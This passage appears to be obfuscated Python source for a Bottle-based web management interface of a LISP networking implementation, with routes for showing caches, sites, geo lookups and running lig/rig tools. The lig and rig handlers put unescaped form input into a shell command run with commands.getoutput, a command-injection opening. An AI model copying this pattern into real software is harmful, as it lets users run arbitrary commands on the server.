if 29 - 29: II111iiii . OoOoOO00 % o0oOOo0O0Ooo * II111iiii - o0oOOo0O0Ooo * iIii1I11I1II1
if 35 - 35: II111iiii - IiII . i1IIi
OOoOO0o0o0 = "show rtr-map-cache" + "%" + oO
return ( lispconfig . lisp_process_show_command ( Oo ,
OOoOO0o0o0 ) )
if 95 - 95: I1IiiI + I1IiiI - OOooOOo - iII111i
if 45 - 45: Ii1I . OoooooooOO
if 27 - 27: Ii1I * Oo0Ooo . OoOoOO00
if 17 - 17: II111iiii % iII111i * OOooOOo % i1IIi . I1IiiI . iIii1I11I1II1
if 27 - 27: i11iIiiIii - I1IiiI
if 35 - 35: OoooooooOO - I1Ii111 / OoO0O00
if 50 - 50: OoOoOO00
@ bottle . route ( '/lisp/show/referral' )
def i1i1Ii11Ii ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 57 - 57: OOooOOo + I1Ii111 % I1ii11iIi11i . OoO0O00 / OoO0O00 * O0
return ( lispconfig . lisp_process_show_command ( Oo ,
"show referral-cache" ) )
if 6 - 6: i1IIi - II111iiii * o0oOOo0O0Ooo . OoO0O00
if 68 - 68: o0oOOo0O0Ooo
if 20 - 20: I1Ii111 - I1Ii111
if 37 - 37: IiII
if 37 - 37: Oo0Ooo / IiII * O0
if 73 - 73: iII111i * iII111i / ooOoO0o
if 43 - 43: I1ii11iIi11i . i1IIi . IiII + O0 * Ii1I * O0
@ bottle . post ( '/lisp/show/referral/lookup' )
def II11ii ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 39 - 39: iII111i . I1IiiI * OoOoOO00 - i11iIiiIii
if 1 - 1: iII111i * OoOoOO00
oO = bottle . request . forms . get ( "eid" )
if ( lispconfig . lisp_validate_input_address_string ( oO ) == False ) :
i1I1ii = "Address '{}' has invalid format" . format ( oO )
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 66 - 66: OoOoOO00 + i1IIi % II111iiii . O0 * I1ii11iIi11i % I1ii11iIi11i
if 87 - 87: OOooOOo + o0oOOo0O0Ooo . iII111i - OoooooooOO
OOoOO0o0o0 = "show referral-cache" + "%" + oO
return ( lispconfig . lisp_process_show_command ( Oo , OOoOO0o0o0 ) )
if 6 - 6: iIii1I11I1II1 * OoooooooOO
if 28 - 28: Oo0Ooo * o0oOOo0O0Ooo / I1Ii111
if 52 - 52: O0 / o0oOOo0O0Ooo % iII111i * I1IiiI % OOooOOo
if 69 - 69: I1ii11iIi11i
if 83 - 83: o0oOOo0O0Ooo
if 38 - 38: I1Ii111 + OoooooooOO . i1IIi
if 19 - 19: iII111i - o0oOOo0O0Ooo - Ii1I - OoOoOO00 . iII111i . I1Ii111
@ bottle . route ( '/lisp/show/delegations' )
def i11I1I ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 71 - 71: iII111i
return ( lispconfig . lisp_process_show_command ( Oo ,
"show delegations" ) )
if 23 - 23: i1IIi . iIii1I11I1II1 . OOooOOo . O0 % Ii1I % i11iIiiIii
if 11 - 11: O0 - II111iiii . OOooOOo . Ii1I % I1Ii111
if 21 - 21: Oo0Ooo / iII111i . I1Ii111 * OoooooooOO + I11i - i1IIi
if 58 - 58: I1ii11iIi11i
if 2 - 2: II111iiii / I1Ii111
if 54 - 54: i1IIi . I11i - I1ii11iIi11i + ooOoO0o + Oo0Ooo / Oo0Ooo
if 22 - 22: ooOoO0o . iIii1I11I1II1
@ bottle . post ( '/lisp/show/delegations/lookup' )
def i1IiiiiIi1I ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 56 - 56: OoooooooOO * O0
if 85 - 85: OoooooooOO % OoOoOO00 * iIii1I11I1II1
oO = bottle . request . forms . get ( "eid" )
if ( lispconfig . lisp_validate_input_address_string ( oO ) == False ) :
i1I1ii = "Address '{}' has invalid format" . format ( oO )
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 44 - 44: iIii1I11I1II1 . I1ii11iIi11i + I1Ii111 . ooOoO0o
if 7 - 7: I1ii11iIi11i + iIii1I11I1II1 * I11i * I11i / II111iiii - Ii1I
OOoOO0o0o0 = "show delegations" + "%" + oO
return ( lispconfig . lisp_process_show_command ( Oo , OOoOO0o0o0 ) )
if 65 - 65: oO0o + OoOoOO00 + II111iiii
if 77 - 77: II111iiii
if 50 - 50: O0 . O0 . ooOoO0o % Oo0Ooo
if 68 - 68: oO0o
if 10 - 10: Ii1I
if 77 - 77: OOooOOo / II111iiii + IiII + ooOoO0o - i11iIiiIii
if 44 - 44: I1IiiI + OoOoOO00 + I1ii11iIi11i . I1IiiI * OoOoOO00 % iIii1I11I1II1
if 72 - 72: OOooOOo . OOooOOo - I1ii11iIi11i
if 48 - 48: Oo0Ooo - ooOoO0o + Oo0Ooo - I1IiiI * i11iIiiIii . iII111i
@ bottle . route ( '/lisp/show/site' )
@ bottle . route ( '/lisp/show/site/<eid_prefix>' )
def I1 ( eid_prefix = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 35 - 35: I1IiiI
if 36 - 36: i1IIi - I1ii11iIi11i - I1Ii111
OOoOO0o0o0 = "show site"
if 7 - 7: i11iIiiIii + I1IiiI
if ( eid_prefix != "" ) :
OOoOO0o0o0 = lispconfig . lisp_parse_eid_in_url ( OOoOO0o0o0 , eid_prefix )
if 47 - 47: I1Ii111 - OOooOOo / ooOoO0o - Oo0Ooo + iII111i - iIii1I11I1II1
return ( lispconfig . lisp_process_show_command ( Oo , OOoOO0o0o0 ) )
if 68 - 68: Ii1I - oO0o + Oo0Ooo
if 44 - 44: Ii1I * o0oOOo0O0Ooo * II111iiii
if 5 - 5: i1IIi + O0 % O0 * O0 + OoOoOO00 % i1IIi
if 80 - 80: iII111i / o0oOOo0O0Ooo + OoO0O00 / oO0o
if 46 - 46: i11iIiiIii / IiII % i1IIi - I11i * OoOoOO00
if 94 - 94: Ii1I - I1ii11iIi11i + o0oOOo0O0Ooo - Oo0Ooo
if 15 - 15: OOooOOo
@ bottle . route ( '/lisp/show/itr/dynamic-eid/<eid_prefix>' )
def i1iiI ( eid_prefix = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 83 - 83: oO0o / iIii1I11I1II1 + i1IIi / iII111i
if 47 - 47: oO0o + OoooooooOO . II111iiii . iII111i
OOoOO0o0o0 = "show itr-dynamic-eid"
if 66 - 66: ooOoO0o * OoOoOO00
if ( eid_prefix != "" ) :
OOoOO0o0o0 = lispconfig . lisp_parse_eid_in_url ( OOoOO0o0o0 , eid_prefix )
if 2 - 2: oO0o . I1Ii111 * Oo0Ooo + O0 - I11i * iIii1I11I1II1
return ( lispconfig . lisp_process_show_command ( Oo , OOoOO0o0o0 ) )
if 12 - 12: o0oOOo0O0Ooo * I1Ii111 % II111iiii * i1IIi * iIii1I11I1II1
if 81 - 81: Oo0Ooo - I11i
if 24 - 24: OoooooooOO . OoO0O00 * II111iiii
if 59 - 59: I1Ii111 + OoO0O00 / OOooOOo
if 97 - 97: Oo0Ooo * iII111i % ooOoO0o . iII111i - I1Ii111 - OOooOOo
if 79 - 79: I1IiiI - ooOoO0o
if 37 - 37: IiII . Oo0Ooo * Oo0Ooo * II111iiii * O0
@ bottle . route ( '/lisp/show/etr/dynamic-eid/<eid_prefix>' )
def o00OOo000O ( eid_prefix = "" ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 42 - 42: IiII % iII111i % o0oOOo0O0Ooo % oO0o + I11i % OoOoOO00
if 3 - 3: oO0o
OOoOO0o0o0 = "show etr-dynamic-eid"
if 64 - 64: OoO0O00 . I1IiiI - OoooooooOO . ooOoO0o - iII111i
if ( eid_prefix != "" ) :
OOoOO0o0o0 = lispconfig . lisp_parse_eid_in_url ( OOoOO0o0o0 , eid_prefix )
if 77 - 77: Ii1I % OoOoOO00 / II111iiii % iII111i % OoooooooOO % OoO0O00
return ( lispconfig . lisp_process_show_command ( Oo , OOoOO0o0o0 ) )
if 19 - 19: IiII * I1Ii111 / oO0o * I1Ii111 - OoooooooOO * I11i
if 17 - 17: II111iiii + Oo0Ooo . I1Ii111
if 12 - 12: I1Ii111 + OOooOOo + I11i . IiII / Ii1I
if 29 - 29: IiII . ooOoO0o - II111iiii
if 68 - 68: iIii1I11I1II1 + II111iiii / oO0o
if 91 - 91: OoOoOO00 % iIii1I11I1II1 . I1IiiI
if 70 - 70: I11i % II111iiii % O0 . i1IIi / I1Ii111
@ bottle . post ( '/lisp/show/site/lookup' )
def OO0ooOoOO0OOo ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 51 - 51: iIii1I11I1II1 * o0oOOo0O0Ooo / iIii1I11I1II1 . iIii1I11I1II1 . iII111i * I11i
if 93 - 93: oO0o * Ii1I
oO = bottle . request . forms . get ( "eid" )
if ( lispconfig . lisp_validate_input_address_string ( oO ) == False ) :
i1I1ii = "Address '{}' has invalid format" . format ( oO )
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 27 - 27: I1IiiI * ooOoO0o
if 77 - 77: IiII
OOoOO0o0o0 = "show site" + "%" + oO + "@lookup"
return ( lispconfig . lisp_process_show_command ( Oo , OOoOO0o0o0 ) )
if 66 - 66: iIii1I11I1II1 . i11iIiiIii / I11i / ooOoO0o + I1Ii111
if 5 - 5: OoOoOO00 % iII111i + IiII
if 13 - 13: IiII
if 19 - 19: II111iiii - IiII
if 59 - 59: o0oOOo0O0Ooo * OoO0O00 - Ii1I . OOooOOo
if 89 - 89: OOooOOo
if 69 - 69: ooOoO0o - OoooooooOO * O0
@ bottle . post ( '/lisp/lig' )
def O0Oo0O0 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 33 - 33: ooOoO0o % i1IIi - oO0o . O0 / O0
if 96 - 96: OoooooooOO + IiII * O0
oo0OoOO0o0o = bottle . request . forms . get ( "eid" )
OO0OOO00 = bottle . request . forms . get ( "mr" )
ooOOo0o = bottle . request . forms . get ( "count" )
IiI1Iii1 = "no-info" if bottle . request . forms . get ( "no-nat" ) == "yes" else ""
if 85 - 85: i11iIiiIii / i11iIiiIii . OoO0O00 . O0
if 67 - 67: II111iiii / o0oOOo0O0Ooo . OOooOOo . OoooooooOO
if 19 - 19: IiII . I1ii11iIi11i / OoOoOO00
if 68 - 68: ooOoO0o / OoooooooOO * I11i / oO0o
if ( OO0OOO00 == "" ) : OO0OOO00 = "localhost"
if 88 - 88: o0oOOo0O0Ooo
if 1 - 1: OoooooooOO
if 48 - 48: ooOoO0o * OoOoOO00 - ooOoO0o - OOooOOo + OOooOOo
if 40 - 40: i11iIiiIii . iIii1I11I1II1
if ( oo0OoOO0o0o == "" ) :
i1I1ii = "Need to supply EID address"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( i1I1ii ) ) )
if 2 - 2: i1IIi * oO0o - oO0o + OoooooooOO % OoOoOO00 / OoOoOO00
if 3 - 3: OoooooooOO
O0OoO0o = ""
if os . path . exists ( "lisp-lig.pyo" ) : O0OoO0o = "-O lisp-lig.pyo"
if os . path . exists ( "lisp-lig.py" ) : O0OoO0o = "lisp-lig.py"
if 1 - 1: ooOoO0o % I11i * I1ii11iIi11i - II111iiii
if 49 - 49: oO0o - iII111i % OoOoOO00
if 72 - 72: I1IiiI + IiII . OoOoOO00 + OoOoOO00
if 94 - 94: i11iIiiIii % OoooooooOO / I1IiiI
if ( O0OoO0o == "" ) :
i1I1ii = "Cannot find lisp-lig.py or lisp-lig.pyo"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( i1I1ii ) ) )
if 24 - 24: I1IiiI * oO0o
if 85 - 85: II111iiii . ooOoO0o % OOooOOo % I11i
if ( ooOOo0o != "" ) : ooOOo0o = "count {}" . format ( ooOOo0o )
if 80 - 80: oO0o * I11i / iIii1I11I1II1 % oO0o / iIii1I11I1II1
OOoOO0o0o0 = 'python {} "{}" to {} {} {}' . format ( O0OoO0o , oo0OoOO0o0o , OO0OOO00 , ooOOo0o , IiI1Iii1 )
if 42 - 42: i1IIi / i11iIiiIii . Oo0Ooo * iII111i . i11iIiiIii * O0
i1I1ii = commands . getoutput ( OOoOO0o0o0 )
i1I1ii = i1I1ii . replace ( "\n" , "<br>" )
i1I1ii = lisp . convert_font ( i1I1ii )
if 44 - 44: i1IIi . I1IiiI / i11iIiiIii + IiII
iI111II1ii = lisp . space ( 2 ) + "RLOC:"
i1I1ii = i1I1ii . replace ( "RLOC:" , iI111II1ii )
O0ooO00ooOO0o = lisp . space ( 2 ) + "Empty,"
i1I1ii = i1I1ii . replace ( "Empty," , O0ooO00ooOO0o )
I1i = lisp . space ( 4 ) + "geo:"
i1I1ii = i1I1ii . replace ( "geo:" , I1i )
o0O = lisp . space ( 4 ) + "elp:"
i1I1ii = i1I1ii . replace ( "elp:" , o0O )
I1II = lisp . space ( 4 ) + "rle:"
i1I1ii = i1I1ii . replace ( "rle:" , I1II )
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( i1I1ii ) ) )
if 9 - 9: Oo0Ooo % OoooooooOO - Ii1I
if 43 - 43: OoO0O00 % OoO0O00
if 46 - 46: Oo0Ooo % iIii1I11I1II1 . iII111i . O0 * ooOoO0o / OoooooooOO
if 7 - 7: oO0o - O0 * I11i - o0oOOo0O0Ooo - II111iiii
if 41 - 41: I1IiiI - I1Ii111 % II111iiii . I1Ii111 - I11i
if 45 - 45: Ii1I - OOooOOo
if 70 - 70: OoO0O00 % I1IiiI / I1IiiI . I11i % ooOoO0o . II111iiii
@ bottle . post ( '/lisp/rig' )
def I1ii1Ii1 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 73 - 73: O0 . oO0o + i11iIiiIii + iIii1I11I1II1 - I11i / OoOoOO00
if 99 - 99: I1ii11iIi11i * oO0o * I1ii11iIi11i - II111iiii + Ii1I
oo0OoOO0o0o = bottle . request . forms . get ( "eid" )
OOooO0Oo00 = bottle . request . forms . get ( "ddt" )
iIIIIIIIiIII = "follow-all-referrals" if bottle . request . forms . get ( "follow" ) == "yes" else ""
if 94 - 94: iII111i * iIii1I11I1II1 . I11i
if 13 - 13: iIii1I11I1II1 * OoOoOO00 / I1Ii111 % ooOoO0o + oO0o
if 41 - 41: I1ii11iIi11i
if 5 - 5: Oo0Ooo
if 100 - 100: Ii1I + iIii1I11I1II1
if ( OOooO0Oo00 == "" ) : OOooO0Oo00 = "localhost"
if 59 - 59: IiII
if 89 - 89: OoOoOO00 % iIii1I11I1II1
if 35 - 35: I1ii11iIi11i + I1Ii111 - OoOoOO00 % oO0o % o0oOOo0O0Ooo % OoOoOO00
if 45 - 45: I1IiiI * OOooOOo % OoO0O00
if ( oo0OoOO0o0o == "" ) :
i1I1ii = "Need to supply EID address"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( i1I1ii ) ) )
if 24 - 24: ooOoO0o - I11i * oO0o
if 87 - 87: Ii1I - I1ii11iIi11i % I1ii11iIi11i . oO0o / I1ii11iIi11i
II1io0 = ""
if os . path . exists ( "lisp-rig.pyo" ) : II1io0 = "-O lisp-rig.pyo"
if os . path . exists ( "lisp-rig.py" ) : II1io0 = "lisp-rig.py"
if 25 - 25: OoO0O00 * oO0o % i11iIiiIii + i11iIiiIii * OoO0O00
if 42 - 42: II111iiii / O0 . iIii1I11I1II1 / O0 / OoO0O00 / OoooooooOO
if 62 - 62: O0 . Oo0Ooo
if 33 - 33: Oo0Ooo / iIii1I11I1II1 % i1IIi
if ( II1io0 == "" ) :
i1I1ii = "Cannot find lisp-rig.py or lisp-rig.pyo"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( i1I1ii ) ) )
if 76 - 76: Ii1I + iIii1I11I1II1 + OoOoOO00 . OoO0O00
if 49 - 49: IiII / ooOoO0o / OOooOOo
OOoOO0o0o0 = 'python {} "{}" to {} {}' . format ( II1io0 , oo0OoOO0o0o , OOooO0Oo00 , iIIIIIIIiIII )
if 25 - 25: I1IiiI % O0 + i1IIi - ooOoO0o
i1I1ii = commands . getoutput ( OOoOO0o0o0 )
i1I1ii = i1I1ii . replace ( "\n" , "<br>" )
i1I1ii = lisp . convert_font ( i1I1ii )
if 38 - 38: o0oOOo0O0Ooo % I1Ii111 + i11iIiiIii + iII111i + ooOoO0o / i11iIiiIii
o0OOOOOo0 = lisp . space ( 2 ) + "Referrals:"
i1I1ii = i1I1ii . replace ( "Referrals:" , o0OOOOOo0 )
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( i1I1ii ) ) )
if 57 - 57: iIii1I11I1II1 + iIii1I11I1II1
if 56 - 56: oO0o + ooOoO0o
if 32 - 32: II111iiii + OoOoOO00 % ooOoO0o / OoOoOO00 + I1ii11iIi11i
if 2 - 2: i11iIiiIii - I1Ii111 + OoO0O00 % I11i * Ii1I
if 54 - 54: O0 - iII111i . OOooOOo % iII111i + iII111i
if 36 - 36: OOooOOo % i11iIiiIii
if 47 - 47: i1IIi + II111iiii . Oo0Ooo * oO0o . I11i / i1IIi
if 50 - 50: I1Ii111 / i1IIi % OoooooooOO
def oOOOOO0Ooooo ( eid1 , eid2 ) :
O0OoO0o = None
if os . path . exists ( "lisp-lig.pyo" ) : O0OoO0o = "-O lisp-lig.pyo"
if os . path . exists ( "lisp-lig.py" ) : O0OoO0o = "lisp-lig.py"
if ( O0OoO0o == None ) : return ( [ None , None ] )
if 57 - 57: Ii1I - OoooooooOO
if 68 - 68: o0oOOo0O0Ooo % I1ii11iIi11i / I1Ii111 + I1Ii111 - I1Ii111 . OoO0O00
if 100 - 100: OoOoOO00 % Oo0Ooo
if 76 - 76: II111iiii / OoO0O00 + OoooooooOO . I1ii11iIi11i . I11i . ooOoO0o
iiiI = commands . getoutput ( "egrep -A 2 'lisp map-resolver {' ./lisp.config" )
OO0OOO00 = None
for I1I1 in [ "address = " , "dns-name = " ] :
OO0OOO00 = None
iIIIiiiIiI1 = iiiI . find ( I1I1 )
if ( iIIIiiiIiI1 == - 1 ) : continue
OO0OOO00 = iiiI [ iIIIiiiIiI1 + len ( I1I1 ) : : ]
iIIIiiiIiI1 = OO0OOO00 . find ( "\n" )
if ( iIIIiiiIiI1 == - 1 ) : continue
OO0OOO00 = OO0OOO00 [ 0 : iIIIiiiIiI1 ]
break
if 95 - 95: Ii1I - I1ii11iIi11i - O0 . I1IiiI . iII111i
if ( OO0OOO00 == None ) : return ( [ None , None ] )
if 7 - 7: I1Ii111
if 45 - 45: O0 - OOooOOo
if 56 - 56: O0 + Ii1I
if 24 - 24: i11iIiiIii - Ii1I + oO0o * I1IiiI
OoooOo0 = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
IiI1Ii1ii = [ ]
for oo0OoOO0o0o in [ eid1 , eid2 ] :
if 44 - 44: I1IiiI % Ii1I * I1IiiI . Oo0Ooo + I1ii11iIi11i . OOooOOo
if 6 - 6: IiII * OoooooooOO + I1Ii111 / Ii1I
if 35 - 35: ooOoO0o % I1IiiI - ooOoO0o - OoO0O00 - OoooooooOO
if 46 - 46: i1IIi . i1IIi . oO0o / I11i / ooOoO0o
if 34 - 34: OoooooooOO / Oo0Ooo * i11iIiiIii . II111iiii . OoooooooOO
if ( OoooOo0 . is_geo_string ( oo0OoOO0o0o ) ) :
IiI1Ii1ii . append ( oo0OoOO0o0o )
continue
if 59 - 59: i11iIiiIii . OoooooooOO / I11i * I1ii11iIi11i + OoooooooOO
if 3 - 3: i11iIiiIii * Oo0Ooo % iIii1I11I1II1 % I1IiiI * iII111i / OOooOOo
OOoOO0o0o0 = 'python {} "{}" to {} count 1' . format ( O0OoO0o , oo0OoOO0o0o , OO0OOO00 )
for IIiI1Ii in [ OOoOO0o0o0 , OOoOO0o0o0 + " no-info" ] :
i1I1ii = commands . getoutput ( OOoOO0o0o0 )
iIIIiiiIiI1 = i1I1ii . find ( "geo: " )
if ( iIIIiiiIiI1 == - 1 ) :
if ( IIiI1Ii != OOoOO0o0o0 ) : IiI1Ii1ii . append ( None )
continue
if 95 - 95: IiII * O0 * I1Ii111 . OoooooooOO % Oo0Ooo + I1ii11iIi11i
i1I1ii = i1I1ii [ iIIIiiiIiI1 + len ( "geo: " ) : : ]
iIIIiiiIiI1 = i1I1ii . find ( "\n" )
if ( iIIIiiiIiI1 == - 1 ) :
if ( IIiI1Ii != OOoOO0o0o0 ) : IiI1Ii1ii . append ( None )
continue
if 98 - 98: oO0o . OoooooooOO
IiI1Ii1ii . append ( i1I1ii [ 0 : iIIIiiiIiI1 ] )
break
if 54 - 54: O0 / IiII % ooOoO0o * i1IIi * O0
if 48 - 48: o0oOOo0O0Ooo . oO0o % OoOoOO00 - OoOoOO00
return ( IiI1Ii1ii )
if 33 - 33: I11i % II111iiii + OoO0O00
if 93 - 93: i1IIi . IiII / I1IiiI + IiII
if 58 - 58: I1ii11iIi11i + O0 . Oo0Ooo + OoOoOO00 - OoO0O00 - OoOoOO00
if 41 - 41: Oo0Ooo / i1IIi / Oo0Ooo - iII111i . o0oOOo0O0Ooo
if 65 - 65: O0 * i11iIiiIii . OoooooooOO / I1IiiI / iII111i
if 69 - 69: ooOoO0o % ooOoO0o
if 76 - 76: i11iIiiIii * iII111i / OoO0O00 % I1ii11iIi11i + OOooOOo
@ bottle . post ( '/lisp/geo' )
def IiIi1II111I ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 80 - 80: Ii1I / OOooOOo
if 21 - 21: Oo0Ooo - iIii1I11I1II1 - I1Ii111
oo0OoOO0o0o = bottle . request . forms . get ( "geo-point" )
III1I1Iii11i = bottle . request . forms . get ( "geo-prefix" )
i1I1ii = ""
if 96 - 96: oO0o - oO0o
if 87 - 87: Oo0Ooo / OoooooooOO - I1ii11iIi11i . IiII + iIii1I11I1II1 . I1ii11iIi11i
if 4 - 4: OoooooooOO + ooOoO0o . i1IIi / O0 - O0
if 52 - 52: OoO0O00 * OoooooooOO
if 12 - 12: O0 + IiII * i1IIi . OoO0O00
o0OO0oooo = lisp . lisp_address ( lisp . LISP_AFI_NONE , "" , 0 , 0 )
I11II1i1 = lisp . lisp_geo ( "" )
IiI1ii11I1 = lisp . lisp_geo ( "" )
I1i1iI , I1iI1I1ii1 = oOOOOO0Ooooo ( oo0OoOO0o0o , III1I1Iii11i )
if 33 - 33: o0oOOo0O0Ooo / O0 + OOooOOo
if 75 - 75: IiII % i11iIiiIii + iIii1I11I1II1
if 92 - 92: OoOoOO00 % O0
if 55 - 55: iIii1I11I1II1 * iII111i
if 85 - 85: iIii1I11I1II1 . II111iiii
if ( o0OO0oooo . is_geo_string ( oo0OoOO0o0o ) ) :
if ( I11II1i1 . parse_geo_string ( oo0OoOO0o0o ) == False ) :
i1I1ii = "Could not parse geo-point format"
if 54 - 54: Ii1I . OoooooooOO % Oo0Ooo
elif ( I1i1iI == None ) :
i1I1ii = "EID {} lookup could not find geo-point" . format (
lisp . bold ( oo0OoOO0o0o , True ) )
elif ( I11II1i1 . parse_geo_string ( I1i1iI ) == False ) :
i1I1ii = "Could not parse geo-point format returned from lookup"
if 22 - 22: OOooOOo
if 22 - 22: iII111i * I11i - Oo0Ooo * O0 / i11iIiiIii
if 78 - 78: Oo0Ooo * O0 / ooOoO0o + OoooooooOO + OOooOOo
if 23 - 23: iII111i % OoooooooOO / iIii1I11I1II1 + I1ii11iIi11i / i1IIi / o0oOOo0O0Ooo
if 94 - 94: i1IIi
if 36 - 36: I1IiiI + Oo0Ooo
if ( i1I1ii == "" ) :
if ( o0OO0oooo . is_geo_string ( III1I1Iii11i ) ) :
if ( IiI1ii11I1 . parse_geo_string ( III1I1Iii11i ) == False ) :
i1I1ii = "Could not parse geo-prefix format"
if 46 - 46: iII111i
elif ( I1iI1I1ii1 == None ) :
i1I1ii = "EID-prefix {} lookup could not find geo-prefix" . format ( lisp . bold ( III1I1Iii11i , True ) )
if 65 - 65: i1IIi . I1ii11iIi11i / ooOoO0o
elif ( IiI1ii11I1 . parse_geo_string ( I1iI1I1ii1 ) == False ) :
i1I1ii = "Could not parse geo-prefix format returned from lookup"
if 11 - 11: IiII * ooOoO0o / ooOoO0o - OOooOOo
if 68 - 68: I1IiiI % IiII - IiII / I1IiiI + I1ii11iIi11i - Oo0Ooo
if 65 - 65: ooOoO0o - i1IIi
if 62 - 62: I11i / oO0o % Oo0Ooo . OoooooooOO / i11iIiiIii / I1Ii111
if 60 - 60: I1IiiI % oO0o / o0oOOo0O0Ooo % oO0o * i11iIiiIii / iII111i
if 34 - 34: I1Ii111 - OOooOOo
if 25 - 25: oO0o % I1IiiI + i11iIiiIii + O0 * OoooooooOO
if ( i1I1ii == "" ) :
oo0OoOO0o0o = "" if ( oo0OoOO0o0o == I1i1iI ) else ", EID {}" . format ( oo0OoOO0o0o )
III1I1Iii11i = "" if ( III1I1Iii11i == I1iI1I1ii1 ) else ", EID-prefix {}" . format ( III1I1Iii11i )
if 64 - 64: i1IIi
if 10 - 10: I1Ii111 % O0 / I1IiiI % I11i
iiII = I11II1i1 . print_geo_url ( )
I1iI1111i = IiI1ii11I1 . print_geo_url ( )
I1Ii1iIIIIi = IiI1ii11I1 . radius
iii = I11II1i1 . dms_to_decimal ( )
iii = ( round ( iii [ 0 ] , 6 ) , round ( iii [ 1 ] , 6 ) )
O000OOO = IiI1ii11I1 . dms_to_decimal ( )
O000OOO = ( round ( O000OOO [ 0 ] , 6 ) , round ( O000OOO [ 1 ] , 6 ) )
o0 = round ( IiI1ii11I1 . get_distance ( I11II1i1 ) , 2 )
IIi1 = "inside" if IiI1ii11I1 . point_in_circle ( I11II1i1 ) else "outside"
if 73 - 73: OOooOOo + OOooOOo % I11i * i1IIi
if 4 - 4: OOooOOo - oO0o % OoOoOO00 / II111iiii % oO0o
O0OO0OoO = lisp . space ( 2 )
o0OOo = lisp . space ( 1 )
IiI1Ii11Ii = lisp . space ( 3 )
if 99 - 99: O0 . o0oOOo0O0Ooo % I11i - Oo0Ooo / I11i
i1I1ii = ( "Geo-Point:{}{} {}{}<br>Geo-Prefix:{}{} {}, {} " + "kilometer radius{}<br>" ) . format ( O0OO0OoO , iiII , iii , oo0OoOO0o0o ,
# I1Ii111 / OoOoOO00
o0OOo , I1iI1111i , O000OOO , I1Ii1iIIIIi , III1I1Iii11i )
i1I1ii += "Distance:{}{} kilometers, point is {} of circle" . format ( IiI1Ii11Ii ,
o0 , lisp . bold ( IIi1 , True ) )
if 82 - 82: OoooooooOO . Ii1I
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( i1I1ii ) ) )
if 26 - 26: oO0o + IiII - II111iiii . II111iiii + I1ii11iIi11i + OoOoOO00
if 68 - 68: O0
if 76 - 76: I1ii11iIi11i
if 99 - 99: o0oOOo0O0Ooo
if 1 - 1: Ii1I * OoOoOO00 * OoO0O00 + Oo0Ooo
if 90 - 90: I1Ii111 % Oo0Ooo - Oo0Ooo . iIii1I11I1II1 / OOooOOo + I11i
if 89 - 89: oO0o
if 87 - 87: iII111i % Oo0Ooo
if 62 - 62: OoO0O00 + ooOoO0o / iII111i * i11iIiiIii
def iiIIIIiI111 ( addr_str , port , nonce ) :
if ( addr_str != None ) :
for OoooOO0Oo0 in lisp . lisp_info_sources_by_address . values ( ) :
I1iIiIii = OoooOO0Oo0 . address . print_address_no_iid ( )
if ( I1iIiIii == addr_str and OoooOO0Oo0 . port == port ) :
return ( OoooOO0Oo0 )
if 76 - 76: OoO0O00 . OoooooooOO % I1Ii111 * Ii1I
if 23 - 23: IiII + iIii1I11I1II1
return ( None )
if 14 - 14: O0 % IiII % Ii1I * oO0o
if 65 - 65: I11i % oO0o + I1ii11iIi11i
if ( nonce != None ) :
if ( nonce not in lisp . lisp_info_sources_by_nonce ) : return ( None )
return ( lisp . lisp_info_sources_by_nonce [ nonce ] )
if 86 - 86: iIii1I11I1II1 / O0 . I1Ii111 % iIii1I11I1II1 % Oo0Ooo
return ( None )
if 86 - 86: i11iIiiIii - o0oOOo0O0Ooo . ooOoO0o * Oo0Ooo / Ii1I % o0oOOo0O0Ooo
if 61 - 61: o0oOOo0O0Ooo + OoOoOO00
if 15 - 15: OoOoOO00 * oO0o + OOooOOo . I11i % I1IiiI - ooOoO0o
if 13 - 13: OoOoOO00 % OoOoOO00 % Oo0Ooo % I1IiiI * i1IIi % I11i
if 82 - 82: IiII . OoOoOO00 / ooOoO0o + iII111i - ooOoO0o
if 55 - 55: ooOoO0o % Oo0Ooo % o0oOOo0O0Ooo
if 29 - 29: IiII / iIii1I11I1II1 + I1ii11iIi11i % iII111i % I11i
if 46 - 46: iIii1I11I1II1
def oo0oO00o0O00o ( lisp_sockets , info_source , packet ) :
if 98 - 98: ooOoO0o . OOooOOo
if 60 - 60: OoO0O00 - i1IIi . OOooOOo + OOooOOo * OOooOOo + Ii1I
if 66 - 66: OOooOOo * OOooOOo / iIii1I11I1II1 + OoOoOO00 . OOooOOo
if 51 - 51: I1ii11iIi11i
o0oOOOOoo0 = lisp . lisp_ecm ( 0 )
packet = o0oOOOOoo0 . decode ( packet )
if ( packet == None ) :
lisp . lprint ( "Could not decode ECM packet" )
return ( True )
if 80 - 80: i11iIiiIii % I1ii11iIi11i
if 54 - 54: o0oOOo0O0Ooo + I11i - iIii1I11I1II1 % ooOoO0o % IiII
